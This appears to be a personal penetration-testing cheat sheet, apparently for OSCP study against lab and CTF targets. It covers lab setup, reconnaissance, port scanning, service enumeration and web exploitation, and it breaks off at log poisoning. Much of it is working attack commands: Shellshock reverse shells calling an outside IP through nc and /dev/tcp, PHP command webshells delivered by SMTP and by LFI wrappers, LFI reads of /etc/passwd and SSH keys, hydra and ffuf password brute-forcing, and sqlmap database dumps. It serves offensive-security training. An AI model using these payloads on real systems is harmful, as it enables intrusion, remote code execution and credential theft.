[TOC]

L a b   S e t u p
===========

## **0a. HOST / Windows**
---
joplin notes (https://joplinapp.org/)  
greenshot (https://getgreenshot.org/downloads/)


## **0b. VM / Windows (BOF)**
---
1. Have **Windows 10** ready for Win-BOF - both 32- and 64bit  
-> Media Creation Tool  

1. Install Vm-Tools (Player > Manage > Install...)

1. Immunity Debugger  
https://www.immunityinc.com/products/debugger/  
Enter fake data to download.  
Click YES for install python


1. `mona.py`  
https://github.com/corelan/mona  
https://raw.githubusercontent.com/corelan/mona/master/mona.py  
Copy `mona.py` to  
    ```
    C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands
    ```

1. Configure mona  
Start  Immunity Debugger **as Administrator**  
Enter into the command input box at the bottom
    ```
    !mona config -set workingfolder c:\mona\%p
    ```

1. Configure Immunity Debugger  
Start **as Administrator**  
Right-click into one window > Appearance > Fonts > OME  
Options > Debugging Options > Security > uncheck "Warn when terminating active processes" 

1. Turn Anti-Virus / Defender off  
Start > Setting > Antivirus > Manage Settings > Realtime protection > Off

1. Security-Checker for BOF
Download  
https://github.com/trailofbits/winchecksec/releases  
Extract ZIP (e.g. windows.Win32.Release.zip)

1. Install mingw-64 - IF NEEDED  
https://sourceforge.net/projects/mingw-w64/  
add bin directory to PATH
    ```
    setx path "%path%;C:\mingw\mingw32\bin"
    ```

## **0c. VM / KALI**
---
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

**edit VM setup - if necessary**  
Network: Bridged or NAT  
RAM: 4096 MB

**Setup kali**  
Login as kali / kali
~~~
sudo su
passwd
reboot
~~~

Log in as root
~~~
wget -O get_tools.sh https://bitbucket.org/myoscp/myoscp.bitbucket.org/raw/HEAD/scripts/get_tools.sh
chmod 755 ./get_tools.sh
./get_tools.sh
~~~

**install FoxyProxy addon for Firefox**  
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/  
and configure "Burp"-setting (http, 127.0.0.1:8080)

**Set Scroll Back History and Color Scheme in terminal**  

1. open terminal > right click into windows > Preferences > Appearance > set "Color scheme": WhiteOnBlack

1. open terminal > right click into windows > Preferences > Appearance > Application transparency: 0 %

1. open terminal > right click into windows > Preferences > Behavior   > set "History size": 5000

**GEDIT tabs**  
open GEDIT -> menu -> preferences -> editor:  

1. set "Tab with: 4"

1. check "Insert spaces instead of tabs"

**for ssl and nikto**  
~~~
gedit /etc/ssl/openssl.cnf  
~~~
change to TLSv1 and seclevel to 1:
~~~
[system_default_sect]  
MinProtocol = TLSv1  
CipherString = DEFAULT@SECLEVEL=1
~~~

**SMB Conf**  
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED   
add directly after `[global]` :
~~~
gedit /etc/samba/smb.conf

client min protocol = NT1
~~~

**Burp - Turbo Intruder**  
Tab Extender > BApp Store > Turbo Intruder

**restart network manager - if needed**  
~~~
systemctl restart NetworkManager
~~~

For BOF GDB???
~~~
install peda.py !!!!!!!!!!!! ?????????
~~~

## **0d. Connect to THM / TryHackMe**
---
~~~text
openvpn ~/thm_scubid.ovpn
~~~

M e t h o d o l o g y
===========
https://wiki.owasp.org/index.php/Testing_Checklist

https://book.hacktricks.xyz/pentesting-methodology  

https://ippsec.rocks/

## **1. Reconnaissance / OSINT**
### **Domain infos**  
---
~~~
nslookup -type=any vulnbegin.co.uk
~~~
~~~
whois vulnbegin.co.uk
~~~
Search for subdomains in Kali
~~~
ffuf -fs 8514 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -H "Host: FUZZ.cybox.company" -u http://cybox.company

dnsrecon -d vulnlawyers.co.uk -D ../wordlists/subdomains.txt -t brt
~~~
**faster** than ffuf with **resolver** (-r) - but **no retcode**
~~~
gobuster dns -d vulntraining.co.uk -r 8.8.8.8 -w ../wordlists/content.txt
~~~
~~~
sublist3r ???
~~~
Search for subdomains / SSL records: https://crt.sh

Search for email adresses: https://hunter.io

Search for various information in Kali: 
~~~
theHarvester -d vulnbegin.co.uk
~~~


Search for subdomains: OWASP Amass


Check list of websites if alive: tomnomnom httprobe

Check website techs: builtwith.com, firefox addon: wappalyzer.com
,in Kali: whatweb, Burp Suite (Target>Site Map>Response)

www.shodan

www.netcraft

### **404 / Subdomain takeover**
if subdomain gives 404
~~~
dig @8.8.8.8 http://a.auth.vulnforum.co.uk CNAME

host http://a.auth.vulnforum.co.uk
~~~
if subdomain alias for github, digitalocean, aws, etc. try register it.

## **2. Host discovery & port scan**
### **Host discovery**  
---
~~~
arp-scan -l
~~~
```
netdiscover  
netdiscover -r 172.21.10.0/24
netdiscover -r 10.104.11.0/24 -i tap0
```
~~~
nmap -sn 192.168.1.0/24
~~~

manual ping-sweep  
```
for i in {1..254}; do ping -c 1 192.168.0.$i | grep 'from'; done
```

### **Port scan**  
Various scans like nmap, dirb, wpscan, whatweb in 1 step
```
scan_all.sh $IP  
```
nmap incl. vuln-scan
```
nmap_staged.sh $IP
nmap_staged.sh $IP vuln
```

**TCP** scan
~~~
nmap -T4 -p- -A $IP
~~~

**UDP** scan  
faster mode - only 100 most important ports (-F)
~~~
nmap -sU -F $IP
~~~  

if all UDP ports are filtered (-sV), but **slower**
~~~
nmap -sUV -F $IP
nmap -sUV $IP
~~~  

UDP scan only selected ports
~~~
nmap -sU -A -p 111,137 $IP
~~~

scan for vulnerabilities  
~~~
nmap -p 80,443 --script=auth,brute,discovery,exploit,vuln ${IP}
~~~

**Firewall**  
~~~
--tcp-flags SYN,FIN
~~~

**Portspoofing**  
Too many ports reported as open
~~~
nmap -sF -p- $IP
nmap -sN -p- $IP
nmap -sX -p- $IP
~~~

**Portknocking**  
If nmap shows **SSH filtered**, try to find the sequence  
Sequence e.g. 1356, 6784, 3409
~~~
nmap -Pn --host-timeout 201 --max-retries 0 -p 1356  $IP
nmap -Pn --host-timeout 201 --max-retries 0 -p 6784  $IP
nmap -Pn --host-timeout 201 --max-retries 0 -p 3409  $IP
~~~
See if new ports are open now
~~~
nmap -T5 -p- $IP
~~~
After many failed attempts: Reset the machine! Something may be messed up!

**Other port scans**
~~~
legion
~~~
~~~
netstat -anop |grep LISTENING
~~~
~~~
masscan -p1-65535 --rate 1000 $IP --router-mac 00:0c:29:14:46:33 --interface eth0
~~~

**Other version enumeration**  
Google `launchpad openssh source` or `launchpad apache2 source`, etc. to find out Linux version corresponding to openssh version (=see nmap).


## **3. Services**
---
### **FTP (21)**
#### **Enum**
Try Anonymous, ftp/ftp or default / weak passwords

Connect to different PORT
~~~
ftp $IP 40121

> user ftpuser
331 password required
password: <password>
~~~

#### **Vulnerability Scan**
#### **Exploit**
*use **binary** mode!*
~~~
hydra -e nsr -u -f -L user_ftp.txt -P /usr/share/wordlists/rockyou_50000.txt $IP -s 21 ftp -V 

wget -m --no-passive ftp://anonymous:anonymous@$IP
~~~

### **SSH (22)**
#### **Enum**
**banner grabbing**:  
~~~
ssh $IP  
ssh $IP -c aes128-cbc  
ssh $IP -o KexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc  
~~~
priv key file (id_rsa) has to be protected!
~~~
chmod 400 id_rsa
ssh -i id_rsa user@host
ssh -i id_rsa -p <port> user@host
~~~
**user enumeration**
~~~
/usr/local/bin/ssh_user_enum.py -p 22 $IP milton
~~~
check ca. 12500 names (takes some time!)
~~~
for name in $(cat /usr/share/seclists/Usernames/Names/names.txt| tr '[:upper:]' '[:lower:]' | sort -u); do /usr/local/bin/ssh_user_enum.py $IP $name| grep " valid "; done | tee ssh_enum.txt
~~~

**metasploit** -> auxiliary scanner ssh login

#### **Vulnerability Scan**

#### **Exploit**
##### **Brute Force**  
Reduce threads (-t 6)
~~~
hydra -e nsr -u -f -l root -P wordlist_mut.txt $IP -s 22 ssh -V -t 6
~~~
~~~
medusa -e ns -u helios -P passwd.txt -h $IP -M ssh -v 4 -t 6
~~~
##### **SSH - Shellshock**  
Nmap shellshock script ?

/cgi-bin/ exists ?

If "**authorization-keys**" and “**force command**” execution are implemented.  
Through **bash-4.3** vulnerable, e.g. Ubuntu 12  
Linux versions up to **2014**.

~~~
ssh -i noob noob@$IP '() { :;}; nc 192.168.1.111 4321 -e "/bin/bash"'
~~~
~~~
ssh -i noob noob@$IP '() { :;}; bash -i >& /dev/tcp/192.168.1.111/4321 0>&1'
~~~




### **SMTP (25)**
#### **Enum**
~~~
telnet $IP 25
> vrfy username
> mail from: username
> rcpt to: username
~~~
~~~
nc -nv $IP 25  
~~~

**enumerate users**:  
~~~
apt install smtp-user-enum

# -m number of threads (default 4), -p port
smtp-user-enum -U /usr/share/seclists/Usernames/Names/names.txt -t $IP -m 1 -p 25

for user in $(cat users.txt); do echo VRFY $user | nc -w 1 $IP 25 2>/dev/null|grep '^25' ;done
~~~

 nmap script not working - does not accept RC 252 as valid user, only RC 250
~~~
nmap -p25 $IP --script smtp-enum-users.nse  --script-args userdb=/usr/share/seclists/Usernames/Names/names.txt --script-args smtp-enum-users.methods=VRFY
~~~

#### **Vulnerability Scan**
#### **Exploit**
**send mail with payload**
~~~
nc $IP 25

HELO example.com  
mail from: hacker@example.com  
rcpt to: helios@symfonos.localdomain  
data  
<?php echo system($_GET['cmd']); ?>  

.  
quit
~~~

**read mails**:  
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

**read mails** with payload (cmd=id):  
view-source:http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id



### **DNS (53)**
#### **Enum**
~~~
dnsrecon -d symfonos.local -n $IP -a

dnsenum $IP

# Zone transfer?
dig axfr @$IP
dig axfr @$IP <domain name> +nostat +nocomments +nocmd
~~~

Look for VHOSTS / subdomains
~~~text
ffuf -t 1 -rate 10 -w ../wordlists/subdomains.txt -b ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9 -H "Host: FUZZ.auth.vulnforum.co.uk" -u http://vulnforum.co.uk
~~~
**faster** than ffuf with **resolver** (-r) - but **no retcode**
~~~
gobuster dns -d vulntraining.co.uk -r 8.8.8.8 -w ../wordlists/content.txt
~~~

DNS zone transfer
~~~
sudo nano /etc/hosts
10.10.10.123  friendzone.red 

host -l friendzone.red 10.10.10.123
~~~
#### **Vulnerability Scan**
#### **Exploit**
Look for VHOSTS
~~~
cat /etc/hosts
~~~


### **HTTP (80) / HTTPS (443)**
#### **Methodology**
- whatweb
- nikto
- dirbust (wordlist: Apache? IIS?)
- robots.txt
- webdav? PUT? (s. nikto)
- check https cert (user name, domain, email)
- cewl wordlist
- - use as password list
- - user names?
- look around
- - email?
- - domain? vhosts?
- - user names? 
- - source code
- - download images (stego...)
- - CMS version
- - registration page
- - password reset (reset admin-pw?)
- - login form
- - - reuse creds
- - - default creds
- - - Burp / Owasp ZAP
- - - sqli
- - - bf
- - path traversal
- - LFI\RFI (nikto, nmap)
- - WFUZZ PHP and HTTP parameters (->LFI?)
- - upload possibility
- - Command Injection
- - XSS
- - XXE
- - Deserialization (Node.js, JWT,...)
- searchsploit all service & software versions


#### **Enum**
Look at the source Code!

```
nc -v $IP 80  
```
```
GET / HTTP/1.1
```
Analyze SSL/TLS connection to get e.g. hostname, **admin-panels** (-> /etc/hosts), emails, poss. user names:
~~~
sslscan $IP:8443
sslyze --regular  $IP:443
~~~
Look at the **SSL-Certificate** in firefox


##### **Dirbusting / Fuzzing / Spider**

file extensions
~~~
# common
php,txt

# common backup
bak,old,zip

# common pictures
jpg,png

# IIS
asp,aspx,bat,exe,ps1,info,7z,config,conf

# Apache
html,cgi,htm,js,sh,xml,log,json,jpeg,gif,doc,pdf,mpg,mp3,tar.gz,tar
~~~
**feroxbuster**  
**default recursion level 4** (follow redirects -r)
~~~
feroxbuster -r -x php,txt,html -w /usr/share/wordlists/custom_small.txt -u http://$IP -o dirb.txt ; sort -u dirb.txt>d; mv d dirb.txt
~~~

**extract links from response body** (-e)
~~~
feroxbuster -r -e -x php,txt,html -w /usr/share/wordlists/custom_small.txt -u http://$IP -o dirb.txt ; sort -u dirb.txt>d; mv d dirb.txt
~~~

**2-level recursion** (follow redirects -r)
~~~
feroxbuster -d 2 -r -x php,txt,html -w /usr/share/wordlists/custom_small.txt -u http://$IP -o dirb.txt ; sort -u dirb.txt>d; mv d dirb.txt

feroxbuster -d 2 -r -x php,txt,html -w /usr/share/wordlists/custom_small.txt -u https://$IP:443 -o dirb.txt -k; sort -u dirb.txt>d; mv d dirb.txt
~~~
**No recursion**, 10 threads (default 50, custom wordlist)
~~~
feroxbuster -n -r -x php,txt,html -w /usr/share/wordlists/custom.txt -u http://$IP -o dirb.txt -t 10; sort -u dirb.txt>d; mv d dirb.txt
~~~
**Full recursion** and **basic auth** (-H, change username, password)
~~~text
feroxbuster -d 0 -r -x php,txt,html -w /usr/share/wordlists/custom_small.txt -u http://$IP -o dirb.txt -H "Authorization: Basic $(echo -n 'username:password' | base64)"; sort -u dirb.txt>d; mv d dirb.txt
~~~

through **proxy** on port 31337 (-p)
~~~
feroxbuster -d 2 -x php,txt,html -w /usr/share/wordlists/custom.txt -u http://localhost:8080 -p http://$IP:31337 -o dirb.txt; sort -u dirb.txt>d; mv d dirb.txt
~~~
**Cookie** (-H)
~~~
feroxbuster -r -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9" -w ../wordlists/content.txt -u http://vulnbegin.co.uk -o dirb.txt ; sort -u dirb.txt>d; mv d dirb.txt
~~~
**rate limit** with no recursion (--rate-limit -n)
~~~
feroxbuster --rate-limit 10 -t 1 -n -r -w ../wordlists/content.txt -u http://vulnlawyers.co.uk -o dirb.txt; sort -u dirb.txt>d; mv d dirb.txt
~~~

**gobuster**
```
gobuster dir -e -k -x php,txt -w /usr/share/wordlists/custom.txt -u http://$IP
```
Append / at the end of each request
```
gobuster dir -e -k -x php,txt -f -w /usr/share/wordlists/custom.txt -u http://$IP
```

**threads** 3, timeout 300s:  
~~~
gobuster dir -t 3 --timeout 300s -e -k -x php,txt -f -w /usr/share/wordlists/custom.txt -u http://${IP} > gobuster.txt
~~~
with **basic auth**
~~~

gobuster dir -e -k -x php,txt -f -U milton -P thelaststraw -w /usr/share/wordlists/custom.txt -u http://$IP
~~~
with **exclude** status codes 404,403
~~~
gobuster dir -e -k -x php,txt -f -w /usr/share/wordlists/custom.txt -u http://$IP -b 404,403
~~~

**other wordlists**
~~~
/usr/share/wordlists/custom.txt

/usr/share/wordlists/dirb/small.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
~~~

**dirb**
~~~
dirb http://$IP /usr/share/dirb/wordlists/small.txt -X ,.html,.php,.txt,.zip -w -o dirb.txt  
dirb http://$IP/cgi-bin/ -X ,.pl,.sh,.php,.exe  
dirb https://$IP -X ,.html,.php,.txt,.zip -w -o dirb_443.txt
~~~
also try generated wordlist from **CeWL** if necessary.

With basic auth
~~~
dirb http://$IP:8 -w -u milton:thelaststraw
~~~
or results formatted as simple list and wordlist
~~~text
dirb_list.sh http://$IP:80 small -X ,.html,.php,.txt
dirb_list.sh http://$IP:80 common > dirb_common.txt
dirb_list.sh http://$IP:80 big -r

dirb_list.sh <target URL> <small | common | big> [dirb parameters]
~~~
**!!! if everything is 200, try ffuf to exclude specific responses/junk**

**ffuf** directories and files
**result list**
~~~
ffuf_list.sh -r -recursion -recursion-depth 4 -recursion-strategy greedy -b ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9 -w ../wordlists/content.txt -u http://www.vulnforum.co.uk/FUZZ -t 1 -rate 10 > dirb.txt

~~~
~~~
ffuf -r -w ~/wordlists/content.txt -fc 404 -of csv -o dirb.txt -u http://www.vulnbegin.co.uk/cpadmin/FUZZ ; cat dirb.txt | tr ',' '\t' | cut -d$'\t' -f 5,2 > d ; mv d dirb.txt
~~~
**extensions** (-e), **recursion** (-recursion*)
~~~
ffuf_list.sh -r -recursion -recursion-depth 4 -recursion-strategy greedy -e php,txt -w ~/wordlists/content.txt -fc 404 -u http://www.vulnbegin.co.uk/cpadmin/FUZZ > dirb.txt

~~~

with **output to file** (-of -o), **rate limit** (-t -rate), **cookies / headers** (-H)
~~~
ffuf_list.sh -r -t 1 -rate 10 -recursion -recursion-depth 4 -recursion-strategy greedy -w ../wordlists/content.txt -H "Cookie: token=2eff535bd75e77b62c70ba1e4dcb2873;ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9" -u http://vulnbegin.co.uk/FUZZ > dirb.txt
~~~
with **basic http auth** (-H)
~~~
ffuf -H "Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" -w /usr/share/wordlists/custom.txt -u http://$IP/FUZZ
~~~
**proxy** (-x)
~~~
ffuf -x $IP:31337 -w ~/wordlists/content.txt -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -fc 404

~~~

**brute force password**
~~~
ffuf -fr "Invalid Username or Password" -t 1 -rate 10 -H "Content-Type: application/x-www-form-urlencoded" -b ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSnRjWHB1TWpCMll5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiIxN2YyNDliZjhjOTY1NGNiMTA2Y2IxYzJkMGZjZmMyOSJ9 -w ../wordlists/usernames.txt:USR -w ../wordlists/passwords.txt:PASSWD -d "username=USR&password=PASSWD&method=local" -u http://vulnforum.co.uk/login
~~~

**curl**  
follow redirects (-L), proxy (-x), cookies (-b)
~~~text
curl -L -x localhost:8080 -b 'eaa83fe8b963ab08ce9ab7d4a798de05=el2sotesqgcpotlke9c706t5m0; 2b01af51830ca9615359108de04d9ca1=26b7019p6e7dg4hkbc07ko09u1' -d "username=spiderman&passwd=asd&option=com_login&task=login&return=aW5kZXgucGhw&2a1d4a839eab6b22cd437923d0b3a7b4=1" http://$IP/administrator/index.php
~~~

**dirbuster with GUI**
~~~
dirbuster &
~~~

**spider**
~~~
skipfish -o ./skipfish http://$IP
~~~
with basic auth
~~~
skipfish -A milton:thelaststraw -o ./skipfish http://$IP
~~~

##### **Nikto**
**Nikto**  
~~~
nikto -h http://$IP > nikto.txt  
nikto -h https://$IP > nikto_443.txt
~~~
with **port** specification (no http://)
~~~
nikto -h $IP -port 80 > nikto.txt  
~~~
through **proxy** on port 31337
~~~
nikto -h http://127.0.0.1:8080 -useproxy http://$IP:31337 -nossl
~~~
with **timing** (e.g. IDS)
~~~
nikto -Pause 3 -h http://$IP > nikto.txt  
~~~

or **authenticated** and check all possible dirs (-C all)
~~~
nikto -h http://$IP:8 -id milton:thelaststraw
nikto -h http://$IP:8/breach3 -id milton:thelaststraw -C all
~~~
See STATIC-**COOKIE** in /etc/nikto.conf for cookies.

##### **Whatweb**
```
whatweb http://192.168.83.0/24 --no-errors
```
**nmap enum** scripts
~~~
nmap -p 80 -vv -n --script=http-enum <TargetIP>

locate .nse|grep http
~~~

##### **Banner grab**  
~~~
openssl s_client -connect <target site>:443
~~~

##### **VHOST**  
~~~text
ffuf -fs 8514 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt  -H "Host: FUZZ.cybox.company" -u http://cybox.company
~~~
**faster** than ffuf with **resolver** (-r) - but **no retcode**
~~~
gobuster dns -d vulntraining.co.uk -r 8.8.8.8 -w ../wordlists/content.txt
~~~

#### **Vulnerability Scan**
##### **OWASP - ZAP**  
spider directories & passiv scanning  
active scanning - may mess up the webapp!  
(persisten XSS, change passwords, etc.)
~~~
owasp-zap &
~~~

##### **Wordpress**
Use domain names instead of IP - redirects may not be scanned (/etc/hosts !)
~~~
/opt/CMSmap/cmsmap.py http://$IP -f W

wpscan --url http://derpnstink.local/wordpress/ -e u,ap,t,tt --detection-mode mixed --plugins-detection mixed --log

vs?

wpscan --url http://derpnstink.local/wordpress/ -e u,ap,t,tt --detection-mode mixed --plugins-detection mixed
~~~
Https
~~~
wpscan --url https://derpnstink.local/wordpress/ -e u,ap,t,tt --detection-mode mixed --plugins-detection mixed --disable-tls-checks
~~~
-e u,ap,t ... enumerate users, all plugins, themes 

~~~
nmap $IP --script http-wordpress-enum 
nmap -p 443 $IP --script http-wordpress-users
~~~

Browse these URLs
~~~
http://$IP/wordpress/?static=1&order=asc
https://$IP/wordpress/?static=1&order=asc

http://$IP/wordpress/?static=1

http://$IP/wordpress/?p=1
~~~

Searchsploit all plugins and themes!

##### **Joomla**
~~~
/opt/CMSmap/cmsmap.py http://$IP -f J

joomscan -ec -u http://$IP > joomscan.txt
~~~

##### **Drupal**
~~~
/opt/CMSmap/cmsmap.py http://$IP -f D

droopescan scan -u $IP
~~~

#### **Exploit**
* try credential reuse!
* if cannot connect to webserver directly (cert or cipher probs), try through burp proxy

**Convert & analyze SSL / TLS**  
Convert JKS (.keystore) to PKCS12 / PFX:
~~~
keytool -importkeystore -srckeystore ./keystore -destkeystore ./keystore.p12 -deststoretype pkcs12
~~~
Convert PKCS12 / PFX to PEM:
~~~
openssl pkcs12 -nodes -in keystore.p12 -out keystore.pem -nocerts
~~~

##### **HTTP Login Default / Reused Credentials**
Always google and try **all** default credentials.

Try **all** credentials already discovered (reuse creds).

##### **HTTP Login Brute Force**
Basic auth
~~~
hydra -e srn -u -f -l zeus -P wordlist.txt $IP -V http-head "/atlantis/"
~~~

POST request
~~~
hydra -e srn -u -f -l zeus -P wordlist.txt $IP -V http-post-form "/atlantis.php:username=^USER^&password=^PASS^:Incorrect login"
~~~
execute this before hydra to use **proxy**
~~~
export HYDRA_PROXY=connect://127.0.0.1:8080
~~~
**Ffuf**  
~~~text
# POST - cycle through users first!
ffuf -fr "Incorrect login" -b PHPSESSID=asdadqwrqwe -w ./users.txt:USR -w ./wordlist.txt:PASSWD -d "username=USR&password=PASSWD" -u http://$IP/atlantis.php

# follow redirects (-L)
ffuf -r -fr "Incorrect login" -b PHPSESSID=asdadqwrqwe -w ./users.txt:USR -w ./wordlist.txt:PASSWD -d "username=USR&password=PASSWD" -u http://$IP/atlantis.php

# GET --basic
wfuzz --hc 401 -w /usr/share/wordlists/rockyou_50000.txt -w ./user_ssh.txt --basic FUZ2Z:FUZZ http://$IP:8080/manager/html 
~~~

##### **SQL injection / SQLI**
**sqlmap - NOT ALLOWED on OSCP**  

For beginners
~~~text
sqlmap --wizard
~~~

DB banner grab
~~~text
sqlmap -u "http://sqli.site/view.php?id=1" -b
~~~

Test for injectable parameters
~~~text
sqlmap -u "http://sqli.site/view.php?id=1"
~~~

Test one specific **GET** parameter and find sqli-technique (slow)
~~~text
sqlmap -u "http://sqli.site/view.php?id=1" -p id

sqlmap -u "http://sqli.site/view.php?id=1&param=1" -p "id,param"
~~~

**rate limit / delay** (--delay)
~~~text
sqlmap -u "http://sqli.site/view.php?id=1" -p id --delay=0.1
~~~

**ignore code** e.g.unauthorized 401 (---ignore-code)
~~~text
sqlmap -u "http://sqli.site/view.php?id=1" -p id --ignore-code=401
~~~

Test one specific **POST** parameter with boolean-technique (slow)
~~~text
sqlmap -u http://sqli.site/login.php --data 'username=a&password=a' -p username --technique=B
~~~

Test only **MYSQL** (--dbms) specific
~~~text7
sqlmap -u http://sqli.site/view.php?id=1 -p id --dbms=mysql
~~~

Test one specific parameter with technique UNION (if prev. manually verified)
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U
~~~

Show databases
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U --dbs
~~~

Show users
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U --users
~~~

Show all tables of DB "selfie4you"
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U -D selfie4you --tables
~~~

Show all colums of table "pictures"
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U -D selfie4you -T pictures --columns
~~~

Dump two columns user and picture of table "pictures"
~~~text
sqlmap -u http://sqli.site/view.php?id=1 -p id --technique=U -D selfie4you -T pictures -C user,picture --dump
~~~

Show all databases and all tables
~~~text
sqlmap -u http://sqli.site/view.php?id=1 --tables
~~~

Show all columns in all tables of DB "selfie4you"
~~~text
sqlmap -u http://sqli.site/view.php?id=1 --current-db selfie4you --columns
~~~

Show all data in all tables of DB "selfie4you"
~~~text
sqlmap -u http://sqli.site/view.php?id=1 --current-db selfie4you --dump
~~~


Fully automated - VERY slow:

1. login page through BURP

1. save request as `login.req`

1. `sqlmap -r login.req --batch --level 5 --risk 3`

More specific:  
`sqlmap -r login.req --batch -p username --technique=B --banner`


**google**: pentest sql injection cheat sheet

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass

https://book.hacktricks.xyz/pentesting-web/sql-injection

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

To find the right **data types** and **# of fields** for a UNION-injection, don't forget to try to add an 'id' at the beginning - possibly an autoincrement PK

**AND / OR**

try to order the results by all fields one-by-one - see how result set changes
~~~
' or 1=1 order by 1 -- 
' or 1=1 order by 2 -- 
' or 1=1 order by 3 -- 
...
~~~

**wfuzz**
~~~
wfuzz -t 20 -w ./users.txt -w ./sqli.txt --hs "Incorrect login" -d "username=FUZZ&password=FUZ2Z" http://$IP/atlantis.php
~~~
Try also to **sqli-fuzz** other parameters, e.g. **User-Agent**...

##### **User Registration Page**
- Check error messages for registering with existing user.
- Test SQLI for registration form

##### **WFUZZ PHP and HTTP parameters**
see e.g. SecLists-master\Discovery\Web-Content\burp-parameter-names.txt
~~~text
wfuzz -t 30 -L -w ./params.txt -w ./php_fuzz.txt http://$IP/cgi-bin/underworld/FUZ2Z?FUZZ=1
...
http://192.168.1.137/cgi-bin/underworld/client.php?id=1
http://192.168.1.137/cgi-bin/underworld/image.php?id=1
http://192.168.1.137/cgi-bin/underworld/image.php?field1=1
etc.
~~~

##### **Local File Inclusion (LFI)**
https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/

check if URL like  
~~~text
http://...?page=...
~~~

check if files can be viewed
~~~text
wfuzz --hh 0 -L -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt http://$IP/code.php?page=FUZZ
~~~
authenticated (-b), write to file (-f)
~~~text
wfuzz --hh 0 -L -b PHPSESSID=qg8an250mqneihm06jkcsh3vk7 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt -f lfi_fuzz.txt,raw http://monitor.cybox.company/admin/styles.php?style=FUZZ
~~~

**view files**:  
Null byte (**%00**) at the end prevents adding e.g. ".php" at the end
~~~text
http://...?page=../../../../../../../../etc/passwd%00  

http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index
~~~
Try to get the sensitive files (.ssh/id_rsa, .bash_history, config files, credentials, ...)

LFI File lists
~~~
/usr/share/seclists/Fuzzing/LFI
~~~

Wrapper php://filter
~~~text
http://...xyz.php?m=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
~~~

Wrapper expect://
~~~text
http://example.com/index.php?page=expect://id
~~~

Wrapper zip://
~~~text
# compress PHP reverse shell (payload.php -> payload.zip)
# rename payload.zip to payload.jpg
# upload payload.jpg to server
# unzip payload.jpg to shell.php by:

http://example.com/index.php?page=zip://path/to/payload.jpg%23shell

# if the server does not append .php rename it to shell.php instead
~~~


Wrapper data://
~~~text
echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=

If code execution, you should see phpinfo(), go to the disable_functions and craft a payload with functions which aren't disable.

Code execution with 
	- exec
	- shell_exec
	- system
	- passthru
	- popen

# Example
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

If there is "Shell done !" on the webpage, then there is code execution and you can do things like :

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
~~~

Wrapper input://
~~~text
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
~~~

https://book.hacktricks.xyz/pentesting-web/file-inclusion  
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

-> look for a file **upload** possibility or **send mail** if **SMTP** on

**LOG poisoning**:  
~~~text
nc $IP 80

